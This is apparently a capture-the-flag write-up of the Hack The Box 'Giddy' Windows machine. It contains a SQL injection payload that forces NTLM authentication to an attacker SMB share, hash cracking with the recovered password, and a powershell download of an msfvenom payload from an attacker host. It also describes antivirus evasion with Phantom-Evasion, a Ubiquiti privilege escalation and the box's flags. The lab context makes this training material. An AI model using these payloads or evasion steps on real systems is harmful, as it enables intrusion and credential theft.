HTB Giddy Windows
Recon
Nmap scan
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Gobuster
Under the remote directory we locate a windows 2016 server access page
On the mvc directory we locate a web app running
Exploitation Method 1 SQL Injection and BURPSUITE
After a little of trial and error we find out that the web app is vuln to SQLinjection:
caps--
We start Burpsuite and we made the following search request to the server “cap–”
We capture the request with Burpsuite and modified to
' EXEC master.sys.xp_dirtree'\\10.10.14.34\share--
Then we forward the request We run Responder with the -I tun0 option to set up a smbserver to capture NetNTLM hash
Finally we use John to crack the hash
Stacy : xNnWo6272k7x
We use the obtained creds to login into the remote directory
Privilege Escalation Ubiquiti and Phantom evasion
An find a program called Ubiquiti Unifi Video installed. this program is vulnerable to local priv-esc CVE-2016-6914
We create a msfvenom shell and uploaded to the target machine.
powershell wget "http://10.10.14.14/taskkill.exe" -outfile "taskkill.exe"
However antivirus detects our malicius shell and blocks its execution. So to overcome this. We download and install Phantom-evasion
https://github.com/oddcod3/Phantom-Evasion
We create and upload to our target machine a x64 bit msfvenom payload “taskkill.exe”
powershell wget "http://10.10.14.14/taskkill.exe" -outfile "taskkill.exe"
We proceed to set up multi/handler to catch out shell
We type Stop-Service “Ubiquiti Unifi Video” to shutdown the program Then we use Start-Service Ubiquiti Unifi Video” to restart the program
Finally we obtain a “NT Authority\system” shell
Exploitation Method 2 MSF
Microsoft SQL Server SQLi NTLM Stealer
use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
SMB CAPTURE MODULE
use auxiliary/server/capture/smb
USE JOHN TO CRACK THE HASHED PASSWORDS IN FORMAT:netntlmv2
Stacy : xNnWo6272k7x
FLAGS
Root CF559C6C121F683BF3E56891E80641B1
User 10C1C275385280605E96ADD808C1A0AD